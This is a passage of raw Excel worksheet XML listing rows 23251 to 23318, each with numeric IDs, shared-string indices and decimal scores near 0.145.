        <v>1.4119721E7</v>
      </c>
      <c r="C23251" s="2" t="s">
        <v>22438</v>
      </c>
      <c r="D23251" s="2">
        <v>1.0</v>
      </c>
      <c r="E23251" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23251" s="2">
        <v>0.1490299823633157</v>
      </c>
    </row>
    <row r="23252" ht="15.75" customHeight="1">
      <c r="A23252" s="1">
        <v>33852.0</v>
      </c>
      <c r="B23252" s="2">
        <v>9035563.0</v>
      </c>
      <c r="C23252" s="2" t="s">
        <v>22439</v>
      </c>
      <c r="D23252" s="2">
        <v>1.0</v>
      </c>
      <c r="E23252" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23252" s="2">
        <v>0.1490299823633157</v>
      </c>
    </row>
    <row r="23253" ht="15.75" customHeight="1">
      <c r="A23253" s="1">
        <v>21032.0</v>
      </c>
      <c r="B23253" s="2">
        <v>1.7537151E7</v>
      </c>
      <c r="C23253" s="2" t="s">
        <v>22440</v>
      </c>
      <c r="D23253" s="2">
        <v>1.0</v>
      </c>
      <c r="E23253" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23253" s="2">
        <v>0.1484848484848486</v>
      </c>
    </row>
    <row r="23254" ht="15.75" customHeight="1">
      <c r="A23254" s="1">
        <v>23536.0</v>
      </c>
      <c r="B23254" s="2">
        <v>5942496.0</v>
      </c>
      <c r="C23254" s="2" t="s">
        <v>22441</v>
      </c>
      <c r="D23254" s="2">
        <v>1.0</v>
      </c>
      <c r="E23254" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23254" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="23255" ht="15.75" customHeight="1">
      <c r="A23255" s="1">
        <v>23709.0</v>
      </c>
      <c r="B23255" s="2">
        <v>7176290.0</v>
      </c>
      <c r="C23255" s="2" t="s">
        <v>22442</v>
      </c>
      <c r="D23255" s="2">
        <v>1.0</v>
      </c>
      <c r="E23255" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23255" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="23256" ht="15.75" customHeight="1">
      <c r="A23256" s="1">
        <v>28587.0</v>
      </c>
      <c r="B23256" s="2">
        <v>2.6936421E7</v>
      </c>
      <c r="C23256" s="2" t="s">
        <v>22443</v>
      </c>
      <c r="D23256" s="2">
        <v>1.0</v>
      </c>
      <c r="E23256" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23256" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="23257" ht="15.75" customHeight="1">
      <c r="A23257" s="1">
        <v>33777.0</v>
      </c>
      <c r="B23257" s="2">
        <v>8676124.0</v>
      </c>
      <c r="C23257" s="2" t="s">
        <v>22444</v>
      </c>
      <c r="D23257" s="2">
        <v>1.0</v>
      </c>
      <c r="E23257" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23257" s="2">
        <v>0.1484674329501916</v>
      </c>
    </row>
    <row r="23258" ht="15.75" customHeight="1">
      <c r="A23258" s="1">
        <v>27058.0</v>
      </c>
      <c r="B23258" s="2">
        <v>2.0348183E7</v>
      </c>
      <c r="C23258" s="2" t="s">
        <v>22445</v>
      </c>
      <c r="D23258" s="2">
        <v>1.0</v>
      </c>
      <c r="E23258" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23258" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="23259" ht="15.75" customHeight="1">
      <c r="A23259" s="1">
        <v>23910.0</v>
      </c>
      <c r="B23259" s="2">
        <v>8512123.0</v>
      </c>
      <c r="C23259" s="2" t="s">
        <v>22446</v>
      </c>
      <c r="D23259" s="2">
        <v>1.0</v>
      </c>
      <c r="E23259" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23259" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="23260" ht="15.75" customHeight="1">
      <c r="A23260" s="1">
        <v>24251.0</v>
      </c>
      <c r="B23260" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C23260" s="2" t="s">
        <v>22447</v>
      </c>
      <c r="D23260" s="2">
        <v>1.0</v>
      </c>
      <c r="E23260" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23260" s="2">
        <v>0.1484375000000001</v>
      </c>
    </row>
    <row r="23261" ht="15.75" customHeight="1">
      <c r="A23261" s="1">
        <v>28669.0</v>
      </c>
      <c r="B23261" s="2">
        <v>2.7511131E7</v>
      </c>
      <c r="C23261" s="2" t="s">
        <v>22448</v>
      </c>
      <c r="D23261" s="2">
        <v>1.0</v>
      </c>
      <c r="E23261" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23261" s="2">
        <v>0.148424543946932</v>
      </c>
    </row>
    <row r="23262" ht="15.75" customHeight="1">
      <c r="A23262" s="1">
        <v>21812.0</v>
      </c>
      <c r="B23262" s="2">
        <v>2.681585E7</v>
      </c>
      <c r="C23262" s="2" t="s">
        <v>22432</v>
      </c>
      <c r="D23262" s="2">
        <v>1.0</v>
      </c>
      <c r="E23262" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23262" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="23263" ht="15.75" customHeight="1">
      <c r="A23263" s="1">
        <v>27676.0</v>
      </c>
      <c r="B23263" s="2">
        <v>2.2932768E7</v>
      </c>
      <c r="C23263" s="2" t="s">
        <v>22449</v>
      </c>
      <c r="D23263" s="2">
        <v>1.0</v>
      </c>
      <c r="E23263" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23263" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="23264" ht="15.75" customHeight="1">
      <c r="A23264" s="1">
        <v>29191.0</v>
      </c>
      <c r="B23264" s="2">
        <v>3.07315E7</v>
      </c>
      <c r="C23264" s="2" t="s">
        <v>22450</v>
      </c>
      <c r="D23264" s="2">
        <v>1.0</v>
      </c>
      <c r="E23264" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23264" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="23265" ht="15.75" customHeight="1">
      <c r="A23265" s="1">
        <v>30329.0</v>
      </c>
      <c r="B23265" s="2">
        <v>3812352.0</v>
      </c>
      <c r="C23265" s="2" t="s">
        <v>22451</v>
      </c>
      <c r="D23265" s="2">
        <v>1.0</v>
      </c>
      <c r="E23265" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23265" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="23266" ht="15.75" customHeight="1">
      <c r="A23266" s="1">
        <v>33262.0</v>
      </c>
      <c r="B23266" s="2">
        <v>7361667.0</v>
      </c>
      <c r="C23266" s="2" t="s">
        <v>22452</v>
      </c>
      <c r="D23266" s="2">
        <v>1.0</v>
      </c>
      <c r="E23266" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23266" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="23267" ht="15.75" customHeight="1">
      <c r="A23267" s="1">
        <v>33558.0</v>
      </c>
      <c r="B23267" s="2">
        <v>8195524.0</v>
      </c>
      <c r="C23267" s="2" t="s">
        <v>22453</v>
      </c>
      <c r="D23267" s="2">
        <v>1.0</v>
      </c>
      <c r="E23267" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23267" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="23268" ht="15.75" customHeight="1">
      <c r="A23268" s="1">
        <v>25885.0</v>
      </c>
      <c r="B23268" s="2">
        <v>1.4972945E7</v>
      </c>
      <c r="C23268" s="2" t="s">
        <v>22454</v>
      </c>
      <c r="D23268" s="2">
        <v>1.0</v>
      </c>
      <c r="E23268" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23268" s="2">
        <v>0.1478174603174604</v>
      </c>
    </row>
    <row r="23269" ht="15.75" customHeight="1">
      <c r="A23269" s="1">
        <v>20653.0</v>
      </c>
      <c r="B23269" s="2">
        <v>1.4276765E7</v>
      </c>
      <c r="C23269" s="2" t="s">
        <v>22455</v>
      </c>
      <c r="D23269" s="2">
        <v>1.0</v>
      </c>
      <c r="E23269" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23269" s="2">
        <v>0.1472663139329807</v>
      </c>
    </row>
    <row r="23270" ht="15.75" customHeight="1">
      <c r="A23270" s="1">
        <v>24624.0</v>
      </c>
      <c r="B23270" s="2">
        <v>1.1460893E7</v>
      </c>
      <c r="C23270" s="2" t="s">
        <v>22456</v>
      </c>
      <c r="D23270" s="2">
        <v>1.0</v>
      </c>
      <c r="E23270" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23270" s="2">
        <v>0.1472663139329806</v>
      </c>
    </row>
    <row r="23271" ht="15.75" customHeight="1">
      <c r="A23271" s="1">
        <v>21178.0</v>
      </c>
      <c r="B23271" s="2">
        <v>1.919069E7</v>
      </c>
      <c r="C23271" s="2" t="s">
        <v>22457</v>
      </c>
      <c r="D23271" s="2">
        <v>1.0</v>
      </c>
      <c r="E23271" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23271" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="23272" ht="15.75" customHeight="1">
      <c r="A23272" s="1">
        <v>22554.0</v>
      </c>
      <c r="B23272" s="2">
        <v>3.8270411E7</v>
      </c>
      <c r="C23272" s="2" t="s">
        <v>22458</v>
      </c>
      <c r="D23272" s="2">
        <v>1.0</v>
      </c>
      <c r="E23272" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23272" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="23273" ht="15.75" customHeight="1">
      <c r="A23273" s="1">
        <v>26769.0</v>
      </c>
      <c r="B23273" s="2">
        <v>1.8488898E7</v>
      </c>
      <c r="C23273" s="2" t="s">
        <v>22459</v>
      </c>
      <c r="D23273" s="2">
        <v>1.0</v>
      </c>
      <c r="E23273" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23273" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="23274" ht="15.75" customHeight="1">
      <c r="A23274" s="1">
        <v>10799.0</v>
      </c>
      <c r="B23274" s="2">
        <v>1.5792961E7</v>
      </c>
      <c r="C23274" s="2" t="s">
        <v>22460</v>
      </c>
      <c r="D23274" s="2">
        <v>1.0</v>
      </c>
      <c r="E23274" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23274" s="2">
        <v>0.1468797564687976</v>
      </c>
    </row>
    <row r="23275" ht="15.75" customHeight="1">
      <c r="A23275" s="1">
        <v>18430.0</v>
      </c>
      <c r="B23275" s="2">
        <v>5.2721414E7</v>
      </c>
      <c r="C23275" s="2" t="s">
        <v>22461</v>
      </c>
      <c r="D23275" s="2">
        <v>1.0</v>
      </c>
      <c r="E23275" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23275" s="2">
        <v>0.1467661691542289</v>
      </c>
    </row>
    <row r="23276" ht="15.75" customHeight="1">
      <c r="A23276" s="1">
        <v>22698.0</v>
      </c>
      <c r="B23276" s="2">
        <v>4.2414389E7</v>
      </c>
      <c r="C23276" s="2" t="s">
        <v>22462</v>
      </c>
      <c r="D23276" s="2">
        <v>1.0</v>
      </c>
      <c r="E23276" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23276" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="23277" ht="15.75" customHeight="1">
      <c r="A23277" s="1">
        <v>33566.0</v>
      </c>
      <c r="B23277" s="2">
        <v>8219954.0</v>
      </c>
      <c r="C23277" s="2" t="s">
        <v>22463</v>
      </c>
      <c r="D23277" s="2">
        <v>1.0</v>
      </c>
      <c r="E23277" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23277" s="2">
        <v>0.1466302367941713</v>
      </c>
    </row>
    <row r="23278" ht="15.75" customHeight="1">
      <c r="A23278" s="1">
        <v>20904.0</v>
      </c>
      <c r="B23278" s="2">
        <v>1.6275014E7</v>
      </c>
      <c r="C23278" s="2" t="s">
        <v>22464</v>
      </c>
      <c r="D23278" s="2">
        <v>1.0</v>
      </c>
      <c r="E23278" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23278" s="2">
        <v>0.1465517241379311</v>
      </c>
    </row>
    <row r="23279" ht="15.75" customHeight="1">
      <c r="A23279" s="1">
        <v>27808.0</v>
      </c>
      <c r="B23279" s="2">
        <v>2.32935E7</v>
      </c>
      <c r="C23279" s="2" t="s">
        <v>22465</v>
      </c>
      <c r="D23279" s="2">
        <v>1.0</v>
      </c>
      <c r="E23279" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23279" s="2">
        <v>0.1465277777777778</v>
      </c>
    </row>
    <row r="23280" ht="15.75" customHeight="1">
      <c r="A23280" s="1">
        <v>20485.0</v>
      </c>
      <c r="B23280" s="2">
        <v>1.2866303E7</v>
      </c>
      <c r="C23280" s="2" t="s">
        <v>22466</v>
      </c>
      <c r="D23280" s="2">
        <v>1.0</v>
      </c>
      <c r="E23280" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23280" s="2">
        <v>0.1464646464646465</v>
      </c>
    </row>
    <row r="23281" ht="15.75" customHeight="1">
      <c r="A23281" s="1">
        <v>31186.0</v>
      </c>
      <c r="B23281" s="2">
        <v>4913699.0</v>
      </c>
      <c r="C23281" s="2" t="s">
        <v>22467</v>
      </c>
      <c r="D23281" s="2">
        <v>1.0</v>
      </c>
      <c r="E23281" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23281" s="2">
        <v>0.1462418300653595</v>
      </c>
    </row>
    <row r="23282" ht="15.75" customHeight="1">
      <c r="A23282" s="1">
        <v>30871.0</v>
      </c>
      <c r="B23282" s="2">
        <v>4.625055E7</v>
      </c>
      <c r="C23282" s="2" t="s">
        <v>22468</v>
      </c>
      <c r="D23282" s="2">
        <v>1.0</v>
      </c>
      <c r="E23282" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23282" s="2">
        <v>0.1461538461538462</v>
      </c>
    </row>
    <row r="23283" ht="15.75" customHeight="1">
      <c r="A23283" s="1">
        <v>24227.0</v>
      </c>
      <c r="B23283" s="2">
        <v>1.0450334E7</v>
      </c>
      <c r="C23283" s="2" t="s">
        <v>22469</v>
      </c>
      <c r="D23283" s="2">
        <v>1.0</v>
      </c>
      <c r="E23283" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23283" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="23284" ht="15.75" customHeight="1">
      <c r="A23284" s="1">
        <v>25185.0</v>
      </c>
      <c r="B23284" s="2">
        <v>1.3136447E7</v>
      </c>
      <c r="C23284" s="2" t="s">
        <v>22470</v>
      </c>
      <c r="D23284" s="2">
        <v>1.0</v>
      </c>
      <c r="E23284" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23284" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="23285" ht="15.75" customHeight="1">
      <c r="A23285" s="1">
        <v>27942.0</v>
      </c>
      <c r="B23285" s="2">
        <v>2.3846991E7</v>
      </c>
      <c r="C23285" s="2" t="s">
        <v>22471</v>
      </c>
      <c r="D23285" s="2">
        <v>1.0</v>
      </c>
      <c r="E23285" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23285" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="23286" ht="15.75" customHeight="1">
      <c r="A23286" s="1">
        <v>31745.0</v>
      </c>
      <c r="B23286" s="2">
        <v>5214023.0</v>
      </c>
      <c r="C23286" s="2" t="s">
        <v>22472</v>
      </c>
      <c r="D23286" s="2">
        <v>1.0</v>
      </c>
      <c r="E23286" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23286" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="23287" ht="15.75" customHeight="1">
      <c r="A23287" s="1">
        <v>33070.0</v>
      </c>
      <c r="B23287" s="2">
        <v>6874736.0</v>
      </c>
      <c r="C23287" s="2" t="s">
        <v>22473</v>
      </c>
      <c r="D23287" s="2">
        <v>1.0</v>
      </c>
      <c r="E23287" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23287" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="23288" ht="15.75" customHeight="1">
      <c r="A23288" s="1">
        <v>34053.0</v>
      </c>
      <c r="B23288" s="2">
        <v>9595617.0</v>
      </c>
      <c r="C23288" s="2" t="s">
        <v>22474</v>
      </c>
      <c r="D23288" s="2">
        <v>1.0</v>
      </c>
      <c r="E23288" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23288" s="2">
        <v>0.146057347670251</v>
      </c>
    </row>
    <row r="23289" ht="15.75" customHeight="1">
      <c r="A23289" s="1">
        <v>30386.0</v>
      </c>
      <c r="B23289" s="2">
        <v>3.855712E7</v>
      </c>
      <c r="C23289" s="2" t="s">
        <v>22475</v>
      </c>
      <c r="D23289" s="2">
        <v>1.0</v>
      </c>
      <c r="E23289" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23289" s="2">
        <v>0.1460573476702509</v>
      </c>
    </row>
    <row r="23290" ht="15.75" customHeight="1">
      <c r="A23290" s="1">
        <v>26722.0</v>
      </c>
      <c r="B23290" s="2">
        <v>1.8236815E7</v>
      </c>
      <c r="C23290" s="2" t="s">
        <v>22476</v>
      </c>
      <c r="D23290" s="2">
        <v>1.0</v>
      </c>
      <c r="E23290" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23290" s="2">
        <v>0.145925925925926</v>
      </c>
    </row>
    <row r="23291" ht="15.75" customHeight="1">
      <c r="A23291" s="1">
        <v>8486.0</v>
      </c>
      <c r="B23291" s="2">
        <v>5.4040975E7</v>
      </c>
      <c r="C23291" s="2" t="s">
        <v>22477</v>
      </c>
      <c r="D23291" s="2">
        <v>1.0</v>
      </c>
      <c r="E23291" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23291" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23292" ht="15.75" customHeight="1">
      <c r="A23292" s="1">
        <v>21392.0</v>
      </c>
      <c r="B23292" s="2">
        <v>2.1787143E7</v>
      </c>
      <c r="C23292" s="2" t="s">
        <v>22478</v>
      </c>
      <c r="D23292" s="2">
        <v>1.0</v>
      </c>
      <c r="E23292" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23292" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23293" ht="15.75" customHeight="1">
      <c r="A23293" s="1">
        <v>22077.0</v>
      </c>
      <c r="B23293" s="2">
        <v>3.0660796E7</v>
      </c>
      <c r="C23293" s="2" t="s">
        <v>22479</v>
      </c>
      <c r="D23293" s="2">
        <v>1.0</v>
      </c>
      <c r="E23293" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23293" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23294" ht="15.75" customHeight="1">
      <c r="A23294" s="1">
        <v>24437.0</v>
      </c>
      <c r="B23294" s="2">
        <v>1.0894565E7</v>
      </c>
      <c r="C23294" s="2" t="s">
        <v>22480</v>
      </c>
      <c r="D23294" s="2">
        <v>1.0</v>
      </c>
      <c r="E23294" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23294" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23295" ht="15.75" customHeight="1">
      <c r="A23295" s="1">
        <v>27136.0</v>
      </c>
      <c r="B23295" s="2">
        <v>2.0766861E7</v>
      </c>
      <c r="C23295" s="2" t="s">
        <v>22481</v>
      </c>
      <c r="D23295" s="2">
        <v>1.0</v>
      </c>
      <c r="E23295" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23295" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23296" ht="15.75" customHeight="1">
      <c r="A23296" s="1">
        <v>27829.0</v>
      </c>
      <c r="B23296" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23296" s="2" t="s">
        <v>22482</v>
      </c>
      <c r="D23296" s="2">
        <v>1.0</v>
      </c>
      <c r="E23296" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23296" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23297" ht="15.75" customHeight="1">
      <c r="A23297" s="1">
        <v>31692.0</v>
      </c>
      <c r="B23297" s="2">
        <v>5192460.0</v>
      </c>
      <c r="C23297" s="2" t="s">
        <v>22483</v>
      </c>
      <c r="D23297" s="2">
        <v>1.0</v>
      </c>
      <c r="E23297" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23297" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23298" ht="15.75" customHeight="1">
      <c r="A23298" s="1">
        <v>31762.0</v>
      </c>
      <c r="B23298" s="2">
        <v>5.2155161E7</v>
      </c>
      <c r="C23298" s="2" t="s">
        <v>22484</v>
      </c>
      <c r="D23298" s="2">
        <v>1.0</v>
      </c>
      <c r="E23298" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23298" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23299" ht="15.75" customHeight="1">
      <c r="A23299" s="1">
        <v>33485.0</v>
      </c>
      <c r="B23299" s="2">
        <v>7997737.0</v>
      </c>
      <c r="C23299" s="2" t="s">
        <v>22429</v>
      </c>
      <c r="D23299" s="2">
        <v>1.0</v>
      </c>
      <c r="E23299" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23299" s="2">
        <v>0.1458333333333334</v>
      </c>
    </row>
    <row r="23300" ht="15.75" customHeight="1">
      <c r="A23300" s="1">
        <v>17906.0</v>
      </c>
      <c r="B23300" s="2">
        <v>5.1108539E7</v>
      </c>
      <c r="C23300" s="2" t="s">
        <v>22485</v>
      </c>
      <c r="D23300" s="2">
        <v>1.0</v>
      </c>
      <c r="E23300" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23300" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="23301" ht="15.75" customHeight="1">
      <c r="A23301" s="1">
        <v>21528.0</v>
      </c>
      <c r="B23301" s="2">
        <v>2.3406143E7</v>
      </c>
      <c r="C23301" s="2" t="s">
        <v>22486</v>
      </c>
      <c r="D23301" s="2">
        <v>1.0</v>
      </c>
      <c r="E23301" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23301" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="23302" ht="15.75" customHeight="1">
      <c r="A23302" s="1">
        <v>27826.0</v>
      </c>
      <c r="B23302" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23302" s="2" t="s">
        <v>22486</v>
      </c>
      <c r="D23302" s="2">
        <v>1.0</v>
      </c>
      <c r="E23302" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23302" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="23303" ht="15.75" customHeight="1">
      <c r="A23303" s="1">
        <v>27827.0</v>
      </c>
      <c r="B23303" s="2">
        <v>2.3406142E7</v>
      </c>
      <c r="C23303" s="2" t="s">
        <v>22487</v>
      </c>
      <c r="D23303" s="2">
        <v>1.0</v>
      </c>
      <c r="E23303" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23303" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="23304" ht="15.75" customHeight="1">
      <c r="A23304" s="1">
        <v>30672.0</v>
      </c>
      <c r="B23304" s="2">
        <v>4.2220952E7</v>
      </c>
      <c r="C23304" s="2" t="s">
        <v>22488</v>
      </c>
      <c r="D23304" s="2">
        <v>1.0</v>
      </c>
      <c r="E23304" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23304" s="2">
        <v>0.1455026455026456</v>
      </c>
    </row>
    <row r="23305" ht="15.75" customHeight="1">
      <c r="A23305" s="1">
        <v>20155.0</v>
      </c>
      <c r="B23305" s="2">
        <v>1.0255799E7</v>
      </c>
      <c r="C23305" s="2" t="s">
        <v>22489</v>
      </c>
      <c r="D23305" s="2">
        <v>1.0</v>
      </c>
      <c r="E23305" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23305" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="23306" ht="15.75" customHeight="1">
      <c r="A23306" s="1">
        <v>21465.0</v>
      </c>
      <c r="B23306" s="2">
        <v>2.2765211E7</v>
      </c>
      <c r="C23306" s="2" t="s">
        <v>22490</v>
      </c>
      <c r="D23306" s="2">
        <v>1.0</v>
      </c>
      <c r="E23306" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23306" s="2">
        <v>0.1453703703703704</v>
      </c>
    </row>
    <row r="23307" ht="15.75" customHeight="1">
      <c r="A23307" s="1">
        <v>23012.0</v>
      </c>
      <c r="B23307" s="2">
        <v>4985314.0</v>
      </c>
      <c r="C23307" s="2" t="s">
        <v>22491</v>
      </c>
      <c r="D23307" s="2">
        <v>1.0</v>
      </c>
      <c r="E23307" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23307" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="23308" ht="15.75" customHeight="1">
      <c r="A23308" s="1">
        <v>31784.0</v>
      </c>
      <c r="B23308" s="2">
        <v>5.232511E7</v>
      </c>
      <c r="C23308" s="2" t="s">
        <v>22437</v>
      </c>
      <c r="D23308" s="2">
        <v>1.0</v>
      </c>
      <c r="E23308" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23308" s="2">
        <v>0.1452241715399611</v>
      </c>
    </row>
    <row r="23309" ht="15.75" customHeight="1">
      <c r="A23309" s="1">
        <v>27456.0</v>
      </c>
      <c r="B23309" s="2">
        <v>2.1985173E7</v>
      </c>
      <c r="C23309" s="2" t="s">
        <v>22465</v>
      </c>
      <c r="D23309" s="2">
        <v>1.0</v>
      </c>
      <c r="E23309" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23309" s="2">
        <v>0.1451388888888889</v>
      </c>
    </row>
    <row r="23310" ht="15.75" customHeight="1">
      <c r="A23310" s="1">
        <v>23067.0</v>
      </c>
      <c r="B23310" s="2">
        <v>5044435.0</v>
      </c>
      <c r="C23310" s="2" t="s">
        <v>22492</v>
      </c>
      <c r="D23310" s="2">
        <v>1.0</v>
      </c>
      <c r="E23310" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23310" s="2">
        <v>0.1451077943615257</v>
      </c>
    </row>
    <row r="23311" ht="15.75" customHeight="1">
      <c r="A23311" s="1">
        <v>20190.0</v>
      </c>
      <c r="B23311" s="2">
        <v>1.0504959E7</v>
      </c>
      <c r="C23311" s="2" t="s">
        <v>22493</v>
      </c>
      <c r="D23311" s="2">
        <v>1.0</v>
      </c>
      <c r="E23311" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23311" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="23312" ht="15.75" customHeight="1">
      <c r="A23312" s="1">
        <v>31802.0</v>
      </c>
      <c r="B23312" s="2">
        <v>5.2431411E7</v>
      </c>
      <c r="C23312" s="2" t="s">
        <v>22494</v>
      </c>
      <c r="D23312" s="2">
        <v>1.0</v>
      </c>
      <c r="E23312" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23312" s="2">
        <v>0.144808743169399</v>
      </c>
    </row>
    <row r="23313" ht="15.75" customHeight="1">
      <c r="A23313" s="1">
        <v>22354.0</v>
      </c>
      <c r="B23313" s="2">
        <v>3.4577157E7</v>
      </c>
      <c r="C23313" s="2" t="s">
        <v>22495</v>
      </c>
      <c r="D23313" s="2">
        <v>1.0</v>
      </c>
      <c r="E23313" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23313" s="2">
        <v>0.1446360153256706</v>
      </c>
    </row>
    <row r="23314" ht="15.75" customHeight="1">
      <c r="A23314" s="1">
        <v>24256.0</v>
      </c>
      <c r="B23314" s="2">
        <v>1.0504958E7</v>
      </c>
      <c r="C23314" s="2" t="s">
        <v>22496</v>
      </c>
      <c r="D23314" s="2">
        <v>1.0</v>
      </c>
      <c r="E23314" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23314" s="2">
        <v>0.1446360153256705</v>
      </c>
    </row>
    <row r="23315" ht="15.75" customHeight="1">
      <c r="A23315" s="1">
        <v>34097.0</v>
      </c>
      <c r="B23315" s="2">
        <v>9696819.0</v>
      </c>
      <c r="C23315" s="2" t="s">
        <v>22497</v>
      </c>
      <c r="D23315" s="2">
        <v>1.0</v>
      </c>
      <c r="E23315" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23315" s="2">
        <v>0.1446078431372549</v>
      </c>
    </row>
    <row r="23316" ht="15.75" customHeight="1">
      <c r="A23316" s="1">
        <v>21887.0</v>
      </c>
      <c r="B23316" s="2">
        <v>2.7766519E7</v>
      </c>
      <c r="C23316" s="2" t="s">
        <v>22433</v>
      </c>
      <c r="D23316" s="2">
        <v>1.0</v>
      </c>
      <c r="E23316" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23316" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="23317" ht="15.75" customHeight="1">
      <c r="A23317" s="1">
        <v>24603.0</v>
      </c>
      <c r="B23317" s="2">
        <v>1.1433153E7</v>
      </c>
      <c r="C23317" s="2" t="s">
        <v>22498</v>
      </c>
      <c r="D23317" s="2">
        <v>1.0</v>
      </c>
      <c r="E23317" s="3" t="s">
        <v>22188</v>
      </c>
      <c r="F23317" s="2">
        <v>0.1442652329749105</v>
      </c>
    </row>
    <row r="23318" ht="15.75" customHeight="1">
      <c r="A23318" s="1">
        <v>32312.0</v>
      </c>
      <c r="B23318" s="2">
        <v>5.5682656E7</v>
      </c>
      <c r="C23318" s="2" t="s">
